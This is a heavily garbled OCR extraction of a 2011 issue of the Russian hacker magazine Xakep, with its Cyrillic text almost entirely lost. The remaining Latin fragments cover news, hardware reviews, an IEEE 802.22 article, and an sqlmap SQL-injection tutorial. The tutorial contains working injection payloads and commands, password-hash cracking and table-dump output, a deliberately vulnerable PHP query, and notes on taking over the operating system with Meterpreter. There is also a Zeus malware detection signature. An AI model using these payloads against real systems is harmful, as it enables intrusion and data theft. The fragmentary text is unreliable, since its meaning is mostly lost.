Хакер 2011 10 PDF

SQLMAP: SQL-
028
x 10 (153) 2011
802.22:

WWW.XAKEP.RU
10 (153) 2011
: 210 .
DEFCON:
034
3D- $30
058
MICROSOFT

066
DEFCON
052
153
DEFCON CTF 2011

.
,
.
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID PSYCHO
PHREAKING
PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

Step (step@real.xakep.ru)
Ant (antitster@gmail.com)
D1g1 (evdokimovds@gmail.com)

ART
-
(alik@glc.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
Intro
: 24
, 100% !
:
, , .
,
.
: ?.
: 4 -
.

. ,
:
- .
, .
, , ,
. :
-, xakep.ru, ,
.
DEFCON 19
,
CTF. ,

, whitehat-, .
nikitozz, . .
vkontakte.ru/xakep_mag
10 /153/ 2011

.: (495) 935-7034, : (495) 545-0906

TECHNOLOGY

(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
(birarova@glc.ru)
( )
(tatarenkova@glc.ru)
(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011
001
Content
MEGANEWS
004
011

hacker tweets
-
MALWARE
078
082
FERRUM
016
020
!
80 PLUS Gold

WEXLER.BOOK T5002
088
094
PCZONE
022
027
028
032
033
034
802.22: White Space

WWW2
web-
Sqlmap, SQL-

SQL-
Proof-of-Concept
Linux

3D- $30
3D-
PHREAKING
098
100
104
109
042
046
052
058
062
066
070
076
Easy-Hack

DEFCON CTF
-

-

?
8

local/remote file include

X-Tools

10 /153/ 2011

IRP-

kernel- Mac OS X
JavaScript
Node.js

UNIXOID
112
118

300
,
-
Virus Free Man

122
038

SPYEYE

?
,
,

MegaFAQ Android OS
3.0
Linux kernel 3.0:
SYN/ACK
128
132
136

Linux
Drupal
.
140
143
FAQ UNITED
FAQ
8,5
003
MEGANEWS
TOPIARY . ?
, , LULZSEC
6452
,
The 077 (Hamdi Hacker).

.

- !
,
: , , ,
- .
: ,
, .
!
Cobra Tag, Bluetooth GPS,
Cobra Tag, , .
, , .
,
, .
: , ,
,
. ,
. -
. , 60 !

,

Topiary.

-
LulzSec , . ,
, . 27
18- , ,
, - Twitter
Topiary. .
? . , DdoS- .
, ,
750 000 , NHS,
.
. , LulzSec Exposed , LulzSec.
, (pastebin.com/kfi3Ticq) ,
Topiary ,
, . ? ,
. ,
.
BLACK HAT 2011

:
Anonymous LulzSec
?.
36 % ,
, 64 % ,
.
004
-
Amazon EC2
(Reddit, Netflix . .)
30 .
, -
Amazon !
.

Twitter
1 , .
6,4%

.
30 MSDOS
Microsoft. 30
, 12
1981 ., IBM PC 5150.
PAYPAL

!

! .
10 /153/ 2011
>> coding
MEGANEWS
TWITTER . Twitpic.com .
METASPLOIT
HD MOOR

- (
).
, ,
,
. ,
, . , ,
, ,
.

.
, ,
.
. , .

, -
.
,
.
, :
27 % .
-.
Rapid7
Metasploit Framework 4.0. , , 3.0 2007 .! ,
.
Metasploit ,
. ,
200 ,
.
.
, Metasploit Framework 4.0
3.x-.
DEP ASLR. msfgui GTK Java,
ASCII-. ,
, , Rapid7 , Metasploit 4.0
, .
,
.
GOOGLE MOTOROLA
( ) 12,5
.
Motorola Mobility
,
Android.
2011 2012
. Motorola
Google.
006
716
361
68

Metasploit.
Metasploit
BSD
-
FIREFOX 7
Android.

2050% ,
.
/4
Windows XP,
Avast. 74%
.
10 /153/ 2011
MEGANEWS
83% GOOGLE+ , Bime Analytics.
SAMSUNG GALAXY XCOVER

, ,

, ,

. , ,

Ericsson R310s
. Siemens ME45...
,
, , : ,
. , , , ,
. , ,
. . Samsung , Android Galaxy Xcover (GT-S5690)
. IP67,
,
1
. , Xcover
, Samsung
.
Galaxy Xcover Android 2.3
Gingerbread .
, 135 , 12 .
3,65 ,
, 45 . Galaxy Xcover
800 , 150 -,
microSD, Wi-Fi 802.11n
Bluetooth 3.0, GPS HSPDA.
3 , ( ), FM-, USB 2.0, 3,5- 1500 .
, Galaxy Xcover
, - .
, . ,
2800 , 12,7 . .
, Android . Motorola Defy Sony
Ericsson Xperia Active.
Samsung Galaxy Xcover Samsung Social Hub,

,
XP

WINDOWS XP

50%
49,69%
008
10 /153/ 2011
-

.
, !
Abuse-
( ).

( $5000).
DDoS
( ).

( ).
.

.
Double VPN-

( ).

SMS .

,
.
socks-
( ).
10 /153/ 2011
009
MEGANEWS
ANDROID-
GPRS
,
. ,
(
) GSM-,
,

15 .
Security
Research Labs
GPRS. , GPRS
-
. , T-Mobile, O2 Germany, Vodafone,
GPRS.
GPRS ,
, , ,
. , , 128
. , , ,
,
,

. ,
.
. Chaos Communication
Camp 2011, ,
GPRS, GPRS-,
.
:
,
GPRS
. ,
5 !
,
GPRS,
, .
. ,

. Chaos
Communication Camp ,
. , ,
.
70%
,

,
,

2011 .

.

Android OS

,
Android, CA Technologies.
, , . ,
, , ,
ARM, shangzhou/callrecord
(SDCard). , . , ,
, , . CA Technologies,
. , :
,
,
. , , ,
.
010
10 /153/ 2011
#hacker tweets
. . , . ,
(@asintsov) .
@ChrisJohnRiley:
@google,
,
,
... G+ ,
!
@SecurityHumor:
Google+ CAPTCHA:
, .
,
, ,
" ".
@0xcharlie:
.

!
15% . RSA , ...
:

RSA. ,
.
@nickdepetrillo:
, ,

.
@VUPEN:
Java 7 . ASLR, , ASLR Java
ROP . Oracle/Sun!
10 /153/ 2011
@taviso:
Adobe 400 ,
APSB11-21

. .
: 400! .
, , 50 %
, . , , bit.ly/qjJzZD.
@stephantsov:
! ! ,
IV! ,
#defcon!
:
, ( ,
Defcon CTF
). , !
@pentestit:
SSL- ! http://bit.ly/o8jSrT.
@todb:

, - ,
.
:
,
! .
@str0ke:
packetstormsecurity.com +
exploit-db.com + FD + Daily
@xme:
...
! !
@kevinmitnick:
!!!
: , ,
,
, ,
! .
@frbbs:
J 50 .
, ,
,
Nessus CISSP . http://t.co/PehrnZn.
Dave + metasploit's changelog

.
:
, (@str0ke) .
, , .
@41414141:
! Cisco
TelePresence [...]
root [ ],
.
http://t.co/xjW27eW.
@0xcharlie:
! 010 Editor
Mac OS X.
!
011
MEGANEWS
22 APPLE , Apple Store.
EDIFIER C5
2.1 2.1+
Edifier
,
C5.
2.1 2.1+
( ). 8-
c 3.5- 3/4-
.

FM-, USB- SD-.
, MP3, WMA
& PCM
.
:
: RMS 9W x 2 + 35W x 1 (THD=10%)
-: 85 (A)
: 0.5%
: 10 Ohm
: 8 (210 ), , 4 .
: 3.5 (92 ), , 4 .
: 13 , , , 4 .
: 35 .
, , . AntiSec ,
.
77 -,
, ,
. ,
. ,
10
,
7000 .
, , ,
,
. ,
.
, ,
( ,
). , ,
14 ,
,
PayPal. ,
.

MOZILLA.
Mozilla
,

Boot
to Gecko.
Gecko,
Mozilla:
Firefox Thunderbolt.
Boot to Gecko
-,

HTML5.
012
-
Pastebin

BART (Bay
Area Rapid Transit).
,
100
.
, ,
Anonymous
3

Google,
400 .
,

,
Facebook, Twitter
MySpace, Sophos.
10 /153/ 2011
MEGANEWS
FACEBOOK

IPAD 3 , DigiTimes.

?

. ()
()
arxiv.org/abs/1107.2031
, , , ,
. ,

. Stegobot, ,
( ,
), .
,
, Stegobot ,
- , ! ,
Facebook JPEG- 720720
( Facebook )
50
. ,
Stegobot, .
Facebook , .

Stegobot
Flickr. 7200 ,
.

. .
, . ,
,
.
Facebook

,
...

,
Facebook .
, . , Security Bug Bounty.
, , ,
. ? .
500 , Facebook
.
, , , . Facebook .
, XSS-, CSRF/XSRF,
. ,
,
Facebook, , .
, Facebook
. , .
, Mozilla 3
. , Google 3133,7. , , 300 000 . -
.
40%
50 000 USB, 20%
100 000 .

2,5 !
10 /153/ 2011
(facebook)
013
MEGANEWS
DEFCON CTF. . 52
DEFCON 19
GOOGLE APPLE/MICROSOFT
-

- DEFCON. ,
, , ,
.
.
?
,
(whitehat)
Capture The Flag. ,
DefCon
Kids, 8 16 ,
, .
, Google .
. , defcon.org. . ,
HBGary, ,
HBGary, ,
.
Whoever fights
monsters: confronting Aaron Barr, Anonymous and ourselves
LulzSec, Anonymous,
.
,
Android
.
Microsoft
Samsung Barnes & Noble, Apple HTC Motorola
.
( , -,
), Google
. Google , Microsoft, Apple Oracle
Android ,

. , ,
Android, . , Google

Android .
, Google
Android. ,
, Apple
Samsung Galaxy Tab
10.1 (,
).

Adobe, Flash

, -
-
, HTML5,
CSS3 JavaScript. Adobe
Edge , ,

Adobe Labs.
014
1000

Google
IBM,

.

,

-
Samsung.
Cyanogen
CyanogenMod.
Apple
,
,
2011 .
Steve
Jobs: A Biography.
10 /153/ 2011
MEGANEWS
ANDROID 2.3 (GingerMaster) Android Marketplace.

,

BlackHat
Wireless Aerial
Surveillance Platform ( ). , , ,
WiFi-.
-23, Via Epia Pico ITX
PC (500 Via C7, 1 RAM Backtrack 4 ) ArduPilot.
PPP-over-SSH. .
,
14 (6,35 ) 6 (183 ). Via Epia PX5000EG Pico
ITX PC (500 Via C7, 1 RAM), Linux BackTrack 5.

340 . WASP , WiFi-.
4G-, , ,
Google Earth
. , ,
VPN ,
.
GSM-. GSM-
4G VoIP. ,
. SMS
, 32 .
,
15 .
400 (122 ), , ,
20 000 (6096 ).
-: . ,
, , ,
.
- rabbit-hole.org.
, , Black Hat 2011
DEFCON 19, , . , ,
. ,
.
,
1300 .
, : 6190
XSOUND WINSTON XS
WinstonXS XSoundBar openair-
Winston Global Gathering Freedom Music,
16 2011
-. 30 000
,
.
XSoundBar
. ,

, chillout-,
3D-mapping,
DVJ.
Winston Global Gathering
Freedom Music XSound
.
XSound

,
www.winstonxs.ru.
FERRUM
!

80 PLUS GOLD
? , , , ,
? , . , .
.
, ,
SLI CrossFireX. : .

D-RAM DBS-2200 FSP. ,
,
, ,

.
850 .
.
+12V
, 100 .

+3,3V +5V 20 .
016
, .
+12V 200
. .
:
+3,3V, +5V, +12V.
, : ,
. : ,
,
.

:
Cooler Master Silent Pro Gold 700W
Corsair Professional Series Gold AX750
ENERMAX MODU87+ 800W
FSP AURUM GOLD 600
FSP AURUM GOLD 700
Thermaltake Toughpower Grand 750W
10 /153/ 2011
COOLER MASTER SILENT

PRO GOLD 700W
Silent Pro Gold 700W
Cooler Master.
80 PLUS.
20+4- ,
4+4- 6- .
,
, - , , .
Silent Pro Gold 700W 700 , +12V 56 (672 ).
120 . Silent Pro Gold 700W .
+3,3V
1%, +12V +5V 2%. ,
, ,
. , .
5200
5000
CORSAIR PROFESSIONAL
SERIES GOLD AX750
rofessional Series Gold AX750
, .
,
: , . AX750 (
), , .
(SATA Molex) ,
Cooler Master.
-
. AX750
750 62 (744 )
+12V. 120 .
AX750 .
2 % .
AX750 ,
20%, 20 50%
100% ,
.

,
20%
10 /153/ 2011
017
FERRUM
ENERMAX MODU87+ 800W

ODU87+ 800W ENERMAX.
. , , .
: , ,
, , ,
CordGuard,
, . MODU87+
800W 4 +12V, 30 ,
792 . .
: 12%, . +12V,
. 140 ,
. ,
- ,
.
7900
.
FSP AURUM GOLD 600

,
.
: , , , FSP. :
150 , . FSP AURUM GOLD 600,
, 600 , 90 %,
80 PLUS Gold. 4
+12V 18 .

. , , , +5V,
4%. .
, , .
. ,
.
3100
.
Cooler Master
Silent Pro Gold
700W
Corsair Professional
Series Gold AX750
700
90 %

+3,3V-22 , +5V-25 , +12V- 56 ,
-12V- 0,3 , +5Vsb -3,5
+3,3V & +5V-150 , +12V- 672
750
90 %

+3,3V -25 , +5V-25 , +12V-62 ,
-12V -0,5 , +5Vsb -3
+3,3V & +5V -125 , +12V -744
PFC
120
160 x 150 x 86
3,3
120
160 x 150 x 86
3,3
:
:
+12V

018
ENERMAX
MODU87+ 800W
800
93 %
4
+3,3V-24,+5V-24,+12V1-V4-30,
-12V-0,5,+5Vsb-3
+3,3V & +5V - 120 , +12V1
& +12V4 -792
140
175 x 150 x 86
2,9
10 /153/ 2011
FSP AURUM GOLD 700

AURUM GOLD 700 FSP
,
, , .
- , ( ),
- . AURUM GOLD 700
6+2 pin, SATA Molex,

FDD. 700 , +12V
, , 18 , +3,3V +5V
28 . 120 . AURUM GOLD 700 ,
, .
3% . :
. ,
: - .
3700
.
THERMALTAKE
TOUGHPOWER GRAND 750W
hermlatake Toughpower Grand 750W
, ,
. 180 ! Toughpower Grand 750W, ,
: , ;
; ; , - , 4 ,
, , .
Toughpower Grand 750W . 750 , +12V 720 .
140- ,
. ,
: Toughpower Grand 750W , ,
. , 2 %
, +5V .
5300
.
FSP AURUM
GOLD 600
600
90 %
4
+3,3V-24,+5V-24,+12V1-V4-18,
-12V-0,5,+5Vsb-3,5
+3,3V & +5V -140 , +12V1
& +12V4 - 540
120
150 x 140 x 86
1,9
10 /153/ 2011
FSP AURUM
GOLD 700
700
90 %
4
+3,3V-28,+5V-28,+12V1V4-18,
-12V-0,5,+5Vsb-3,5
+3,3V & +5V -160 , +12V1
& +12V4 - 672
120
150 x 140 x 86
1,9
Thermaltake
Toughpower
Grand 750W
750
92 %

+3,3V-25,+5V-25,+12V-60,
-12V-0,8,+5Vsb-3
+3,3V & +5V - 150 ,
+12V -720
140
180 x 150 x 86
2,5

ENERMAX
MODU87+ 800W. , ,
,
. , , , .
, ,
. ,
80 PLUS Gold,
FSP FSP AURUM GOLD 700. ,
700 , , . z
019
FERRUM

WEXLER.BOOK T5002
2500
.
:
: 5 , 800 480 ,
, , LED-
: 4
: 32 microSD
: TXT, PDB, HTML,
PDF, FB2, EPUB
: MP3, WMA, FLAC, AAC
: JPEG, BMP, GIF
: WMV, RM, AVI, RMVB,
3GP, FLV, MP4, DAT, VOB, MPG, MPEG,
MKV, MOV
: USB 2.0, audio-out
: FM-, ,
: 148 90 11
: 285
: ,
mini-USB > USB,
020
,
, . -
-
. :
, , FM-,

.
WEXLER.BOOK T5002, .
W

WEXLER

.
.
.
, .
WEXLER.BOOK T5002 ,
e-ink:

. :

,
. FM-
.
MP3,
FLAC ACC. , (4 ),
microSD.
:

, -
.
WEXLER.BOOK T5002
,
.
,

, .
: mini-USB
.

,
.
, -
. ,
-, , ,
. ,
, ,
,
.

WEXLER.BOOK T5002 ,

. ,
-, . , ,
.
WiFi - . ,
,
,
e-ink, LCD-
.

, WEXLER.
BOOK T5002 .
.
.
.
10 /153/ 2011
Preview
31 .
.
58

,
, IT-
,

?
Waledac, Rustock, CoreFlood

- ,

Microsoft. ,

, ,
.

,
.
PC ZONE
34
3D- $30
, -
3D- ?
.
MALWARE
82

?

, .
10 /153/ 2011
66

Windows
. 8
.
94

IT-. ESET

.
70

local/
remote file include .
,
.
UNIXOID
118
ANDROID:
, , ,
,

MegaFAQ'.
021
PC ZONE
TGX (korikov_sibsuti@mail.ru)
802.22:
White Space

,
Wi Fi, WiMAX LTE?
,
100
22 /.
022
WWW
IEEE 802.22

802.22: www.ieee802.
org/22.
2011 . (Institute of Electrical and Electronics Engineers)

IEEE
802.22, white space ().
: /- (54862 ) .
,
,
. ?
,
, .
,
( GPS), ,
.
.
INFO

IEEE
802.22 WG
Carlos Cordeiro,
Kiran Challapali
and Dagnachew
Birru IEEE 802.22:
An Introduction to
the First Wireless
Standard based on
Cognitive Radios.
10 /153/ 2011
802.22: White Space
, IEEE 802.22 WRAN , . ,

.
22 / 100 !

(Wireless Regional Area Network, WRAN). .
-
, .
, Wi-Fi, WiMax LTE . .

54 862 , .
,
6 ,
8 , 7- , ,
. 802.22
6 (8,7) .

. .
/ :
( ) .

NTSC (, , ), PAL (), SECAM (, ,
) (, . .)
( . .).
, ATSC/DVB-T
, !
(coexistence) , ,
.
, ( ) ().
.
,
30 4 .
,
.
.
.
(
, ). ,
(sensing) .
GPS-.
IEEE 802.22 , IEEE 802.16 (WiMax), . , 802.22 . .
, 802.22 ,

.

IEEE 802.22 , .
, PHY- (Physical) MAC- (Media Access
Control) OSI , .

,
.
(sensing) .
.
.
,
,
.
.

.

.

, ,
.

.
GPS-.
NMEA
0183. ,
GPS.
10 /153/ 2011

(Time Division Duplexing, TDD).

802.22
III, 1999 . . , cognitive radio ( ),

. ,
. . 2004 .
(Federal Communications Commission)
,
,
. 2004 . IEEE ,
802.22
.
IEEE 802.22 2011 .
023
PC ZONE
WHITE SPACE
DS-
CBP \
US-
1 = 6
FCH
USC
DC map
6
3
US map
7
3
N+1
1 = 10
WRAN
100
WHITE SPACE
SCH
WWAN
15
Wireless Wide Area Network
1 = 6
Wireless Regional Area Network
WMAN
5
Wireless Metropolitan Area Networks
WLAN
150
Wireless Local Area Network

N
N+1
WPAN
10
1 = 160
Wireless Personal Area Network
1 GP=GPS
GL=
2

3 A , V
4
5 N=, S=
6
7 W=, E=
8

9
10
11
12
13 :
A =
D =
E =
N =
14
15 <CR> = 0x0D <LF> = 0X0A
QPSK
16-QAM
64-QAM
NMEA 0183
( , ) .
GPS-,
1
10
11
12
13
14
15
$ G P R M C , h h m m s s . s s , A ,G G M M . M M , P, g g g m m . m m , J,v.v, b b , d d m m y y, x . x , n , m* h h < C R > < L F >
024
10 /153/ 2011
( )
RMC-

802.22: White Space
,
. ,

.
802.22 -
(Orthogonal Frequency Division Multiplexing, OFDM).
WiMax. , .
.
: (Quadrature Phase Shift Key, QPSK),
16 64 (Quadrature
Amplitude Modulation, 16 QAM 64 QAM). , . . , (
).
, , 16 QAM
, QPSK.
,
.
OFDM
. - .
.
,
,
. OFDM ,
.
802.22 , .
(Gallager),

.

-
(Orthogonal Frequency Division Multiple Access, OFDMA).
, . OFDMA , WiMax LTE. OFDM
.
0,624 3,12 //.
. ,
,
.

(channel bonding). ,
18 (21, 24)
.

, .

. /-
(
) . ,
IEEE 802.22 , .
, .
802.22
(superframe). 160 .
(preamble) (superframe
control header, SCH).
.
, , . ,
SCH
. (frame). 10 ,
16 .
.
802.22 ,
. ,
. ,

. SCH
. SCH ,
. ,
.
.
,

. ,
,
, , .
, .

. .
,
. ,
. .
MAC-
(Media Access Control) . MAC,
,
10 /153/ 2011
:
.
: ,
.
:
114 /.
: (Point-to-Multipoint).
: 10100 (
).
: 4 (
, EIRP).
: (
) ,
; ,
( ).
: GPS ( ).
025
Wi-Fi
802.11n
UMTS (3GSM)
WiMax
LTE
802.22
UMTS/W-CDMA
802.16d
LTE
802.22
802.11g
Wi-Fi
.

. 802.11
. Wi-Fi
Wireless Fidelity (
).

,
3G. UMTS

Universal Mobile Telecommunication System.
, 3.9G. WiMax

.

Worldwide Interoperability
for Microwave Access
( ).

CDMA-UMST-.

UMTS-. LTE
3.9G-.
LTE Long Time
Evolution ( ).
802.22
,

.

.
Wi-Fi-
.

.

.
UMTS

3G-.

UMTS,
: HSPA, HSPA+,
HSDPA. 3.5G-.
WiMax
Wi-Fi,
(WMAN).

DSL-.
,
,
Wi-Fi.
LTE .
().
(Yota)

LTE
.
,

.
(
)
38140
46
5100
30100
2,4
2,4 5
18852025
21102200
211
7004000
54862
Ma
54 /
600 /
2 /c
75 /
173 /
23 /
20
2040
1,2520
1,420
624
TDD
TDD
FDD
FDD/TDD
FDD/TDD
TDD
CSMA/CA
OFDMA
W-CDMA
OFDMA
OFDMA/SC-FDMA
OFDMA
MIMO
2003
2009
2001
2004
2009
2011
70250
?
IEEE 802.22, ,
,
. ,
, 802.22
.
,
026
,
. , ,

.
, ,
,
. . z
10 /153/ 2011
PC ZONE
WWW2
ENCIPHER.IT
encipher.it
( , ) : : Gmail, Facebook .
? ,
JavaScript, AES 256.
,
. ,
, , Gmail. , .
, ,
.
BTDIGG
BTDigg.org
-,
. BTDigg BitTorrent, . DHT-! ,
BitTorerent- . , -, ()
. . magnet-, 160- . BTDigg
DHT- -,
-. : @name (
), @content ( ).
IDEONE
ideone.com
DHT
,
ideone, . , 40 . ,
. /C++, Java, C#,
Assembler, Objective C, ( Python) .
: 10 , 15 ( , 5) , 256 . ,
. API,
.
TAGBEEP
tagbeep.com
- , . tagBeep. - . TagBeep , . ,
, , .
, , (, 10 ). TagBeep
,
( , ). SMS-,
, , .

10 /153/ 2011
027
PC ZONE
(miroslav.stampar@gmail.com)
Sqlmap,
SQL-

SQL-
INFO
.
(@stamparm), , (@inquisb), ,
. 2006 .
(@belch), - , 2009 . .
, sqlmap?
,
SQL-
. sqlmap
SQL-,
. , sqlmap
, .
,
:
,
( ). . ,
(
DBMS), ()
. -
SQL-.

SQLMAP?
UNION query SQL injection
028
SQL-,
sqlmap:
UNION query SQL injection.
SQL-, ,
UNION ALL SECECT. ,
-
SELECT : for ,
. Sqlmap ,
(Partial UNION query SQL injection).
Error-based SQL injection.

, HTTP- ( ) DBMS,
-
. , - - (
) DBMS.
Stacked queries SQL injection. ,
- , , , HTTP- (;)
10 /153/ 2011
Sqlmap, SQL-
Boolean-based blind SQL injection
SQL-.
SQL-, SELECT, ( INSERT DELETE). ,
/
, .
, -
, .
Boolean-based blind SQL injection.
: .
. Sqlmap HTTP ,
SELECT (
).
HTTP- headers/body
,

SQL-.

true- ( ).
, sqlmap ,
HTTP. ,
,
( unicode).
Time-based blind SQL injection. .
,
. , DBMS
(, SLEEP() BENCHMARK()). ,
,
SQL-: ?
SQL- , -,
SQL-
(, $query="SELECT *
FROM users WHERE id=".$_REQUEST["id"]).
SQL- ,
. fingerprinting ,
(
users). , , ,
- - (,
).
10 /153/ 2011
.
. , ,
- .

,
. SQL-
, ][ SQL Injection: (bit.ly/pBSNVA).
, DBMS
. sqlmap
MySQL, Oracle, PostgreSQL, Microsoft
SQL Server, Microsoft Access, SQLite, Firebird, Sybase SAP MaxDB.
SQLMAP
SQL- ,
- sqlmap.
, ,
. , sqlmap :
, , .
.
, .
.
, (
), (users)
(pass).
, , ,
- MySQL, MySQL,
PostreSQL Microsoft SQL Server.
,
, .
( SQL-)
DMBS,
IP-, .
TCP- ( out-ofband) ,
.
(), Meterpreter
VNC-.

getsystem Metasploit, , , kitrap0d (MS10-015).
:
, . !
029
PC ZONE

. ,
sqlmap. ,
, OWASP (www.owasp.org),
. ,
sqlmap Python, ,
.
. ,
LAMP (Linux/Apache/MySQL/PHP)
-.
1
, ,
GET- id -,
http://www.site.com/vuln.php?id=1 ( URL -u).
,
( --random-agent), TOR- (--tor). , sqlmap:
$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1"
--random-agent --tor
sqlmap/1.0-dev (r4365) automatic SQL injection
and database takeover tool

17 HTTP(S)-. , , .
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind WHERE or HAVING clause
Payload: id=1 AND 1826=1826
Type: error-based
Title: MySQL >= 5.0 AND error-based WHERE or HAVING clause
Payload: id=1 AND (SELECT 8532 FROM(SELECT COUNT(*),CONCAT(
CHAR(58,98,116,120,58),(SELECT (CASE WHEN (8532=8532) THEN 1
ELSE 0 END)),CHAR(58,98,121,102,58),FLOOR(RAND(0)*2))x FROM

, -
SQL-, , SQL-. , PHP

$query="SELECT name, description, comment FROM catalogs WHERE
catid=".$_GET["catid"]. , GET catid
SQL . , URL
http://www.site.com/vuln.php?page=front&catid=-1
UNION ALL SELECT database(),current_user(),version()&uid=0,
,
.
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: UNION query
Title: MySQL UNION query (NULL) 3 columns
Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,98,116
,120,58),IFNULL(CAST(CHAR(74,76,73,112,111,113,103,118,80,84) AS CH
AR),CHAR(32)),CHAR(58,98,121,102,58))
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(10)
, , , -:
[02:01:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
:
[02:01:45] [INFO] Fetched data logged to text files under '/opt/
sqlmap/output/www.site.com'
2
. ,
fingerprinting (-f)
(--banner) , , ,
(--current-user). , (--passwords) (--tables),
, (--exclude-sysdbs)
. , :
--random-agent --tor -f --banner --current-user --passwords
--tables --exclude-sysdbs
,
:
[02:08:27] [INFO] fetching banner
[02:08:27] [INFO] actively fingerprinting MySQL
[02:08:27] [INFO] executing MySQL comment injection fingerprint
Error-based SQL injection
030
web application technology: PHP 5.2.6, Apache 2.2.9
10 /153/ 2011
Sqlmap, SQL-
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
comment injection fingerprint: MySQL 5.1.41
banner parsing fingerprint: MySQL 5.1.41
banner: '5.1.41-3~bpo50+1'
:
[02:08:28] [INFO] fetching current user
current user: 'root@localhost'
- :
[02:08:28] [INFO] fetching database users password hashes
do you want to perform a dictionary-based attack against retrieved
password hashes? [Y/n/q] Y
[02:08:30] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[02:08:32] [INFO] using default dictionary
[02:08:32] [INFO] loading dictionary from
'/opt/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] N
[02:08:33] [INFO] starting dictionary-based cracking (mysql_passwd)
[02:08:35] [INFO] cracked password 'testpass' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *6B2C58EABD91C1776DA223B088B601604F898847
[*] root [1]:
password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
clear-text password: testpass
! root (
). :
[02:08:35] [INFO] fetching database names
[02:08:35] [INFO] fetching tables for databases:
information_schema, mysql, owasp10, testdb
[02:08:35] [INFO] skipping system databases:
information_schema, mysql
Database: owasp10
[3 tables]
?
SQL-
SQL-.
, PHP PEARs DB
(pear.php.net/package/DB),
SQL-.
: $p = $db->prepare("SELECT * FROM users WHERE
id = ?"); $db->execute($p, array($_GET['id'])). , ,
SQL- ,
SQL- (
). , ,
(, intval()) , mysql_real_escape_string() addslashes(),
. ,
, , .
10 /153/ 2011
+--------------+
| accounts
|
| blogs_table |
| hitlog
|
+--------------+
Database: testdb
[1 table]
+-------------+
| users
|
+-------------+
[02:08:35] [INFO] Fetched data logged to text files under '/opt/
sqlmap/output/www.site.com'
!
3
, testdb- (-D testdb) users (-T users), , ,
(--dump).
, , SQLite
(--replicate).
--random-agent --tor --dump -D testdb -T users --replicate

users :
[02:11:26] [INFO] fetching columns for table 'users' on database
'testdb'
[02:11:26] [INFO] fetching entries for table 'users' on database
'testdb'
Database: testdb
Table: users
[4 entries]
+----+--------+------------+
| id | name | surname
|
+----+--------+------------+
| 2 | fluffy | bunny
|
| 3 | wu
| ming
|
| 1 | luther | blissett |
| 4 | NULL | nameisnull|
+----+--------+------------+
[02:11:27] [INFO] Table 'testdb.users' dumped to sqlite3 file
testdb.
sqlite3 SQLite. ,
,
, SQLite (, SQLite Manager).
Proof-of-concept
DSSS, Python-,
SQL-. , , ,
100 . ,
SQL- .
.
sqlmap,
,
SQL-,
. z
031
PC ZONE
Proof-of-Concept
LINUX

, , . bellard.org/jslinux,
, Linux-,
, . ,

. , PC, JavaScript
! TinyCC. !
? ,
. JavaScript PC Emulator (
)
QEMU. ,
. PoC .

? ?
Unix-
.
JS/UIX (www.masswerk.at/jsuix),

Unix-.

JavaScript . , JS-

Linux.
?
,
(QEMU).
JavaScript PC Emulator , . , ,
, ,
.
JavaScript, JS-. , Jaeger Monkey,
Firefox 4, V8 (Chrome).
, ,
Jaeger Monkey
( -. .
).
JavaScript PC Emulator Firefox
032
,
, x86. (
, , ), .
: CPU c RISC- (-
MIPS ARM),
x86 .

, Linux.
,

( Firefox Chrome).
,
,
.
. z
10 /153/ 2011
PC ZONE
(twitter.com/stepah)

. , . -,

.
: , ,
,
.
PCAP-.

, ,
. , ,
.
Joe Sandbox Web (www.joesecurity.org) ,
-,
, .

, .
PE- , winsocket-
, , ,
, ,
.
. .
, ,

. : -,
10 /153/ 2011
,
, sleep (
2 ), . Joe
Sandbox Web 160 .
.
,
Python- .
Zeus,

:
zeusfiles = ["c:\\windows\\system32\\ntos.exe", \
[... ...]
"c:\\windows\\system32\\lowsec\\user.ds"]
def sigmatch(data):
if data["func"] == "fileCreated":
if data["status"].find("success") != -1:
# , -
for zeusfile in zeusfiles:
if data["path"].lower() == zeusfile:
zeusdetected = True
elif data["func"] == "http":
if zeusdetected:
# IP- C&C-
if re.match( r"POST.*gate\.php", data["request"], re.I):
zeusservers.append(data["dstip"])
Joe Sandbox Web
. -
AutoIt-, ,
. ( ,
, ).
:
. ,

. .
,
, , .
: ,
. Joe Sandbox Web.
, .

. , . z
033
PC ZONE
3D-
$30

3D-

3D-,

,

,
.
, -.
.
034
WWW
www.davidlaserscanner.
com
.
!

,
,
,

.
3D-
.
3D- ( 3D)
,
, , , , . , ,
: ,
. . ,
-,
, .
, -
-,
. .
, .
,
. ,
,
- . ? , , 3D-! :
. , !
( ), ,
3D- . ,
. ,
. , ,
. ,
3D- . , , .
10 /153/ 2011
3D- $30

?
3D-, ,
:
, , -,
.

,
, ,
. , , ,
/
: -
. DAVID-laserscanner (www.david-laserscanner.com) TriAngles
(www.intricad.com), ,
.
:
, .
.
, .
DAVID-laserscanner ,
.
199 229 ,
. . , . ,
, DAVID,
, ,
